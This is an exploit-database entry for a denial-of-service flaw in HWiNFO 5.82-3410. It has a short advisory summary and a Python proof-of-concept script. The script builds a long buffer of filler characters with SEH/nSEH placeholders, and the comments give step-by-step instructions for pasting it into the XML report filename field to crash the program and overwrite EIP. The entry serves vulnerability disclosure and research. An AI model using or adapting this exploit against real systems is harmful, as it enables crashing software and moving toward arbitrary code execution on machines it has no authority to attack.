HWiNFO 5.82-3410 - Denial of Service

vendor:

HWiNFO

by:

bzyo

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: HWiNFO

Affected Version From: 5.82-3410

Affected Version To: 5.82-3410

Patch Exists: Yes

Related CWE: N/A

CPE: a:hwinfo:hwinfo

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x86

2018

HWiNFO 5.82-3410 – Denial of Service

HWiNFO 5.82-3410 is vulnerable to a denial of service attack. An attacker can craft a malicious file containing a large amount of data and send it to the application. When the application attempts to process the file, it will crash and overwrite the EIP register. This can be exploited to execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: HWiNFO 5.82-3410 - Denial of Service
# Date: 05-04-18
# Vulnerable Software: HWiNFO 5.82-3410
# Vendor Homepage: https://www.hwinfo.com/
# Version: 5.82-3410
# Software Link: https://www.hwinfo.com/files/hwi_582.exe
# Tested On: Windows 7 x86
#
# PoC: 
# 1. generate hwinfo.txt, copy contents to clipboard
# 2. open app, select Report, Create
# 3. choose Export format XML
# 4. paste hwinfo.txt contents into filename field
# 5. select Next, Next
#
# app crashes & EIP overwrite;
# !mona seh > only ppr, non-safeseh module contains startnull
# 0x00400000 | 0x00d8b000 | 0x0098b000 | 5.82-3410 [HWiNFO32.EXE] (C:\Program Files\HWiNFO32\HWiNFO32.EXE)
#

filename="hwinfo.txt"
#offset 530
junk = "A"*526

seh = "B"*4

nseh = "C"*4

fill = "D"*9465

buffer = junk + seh + nseh + fill

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()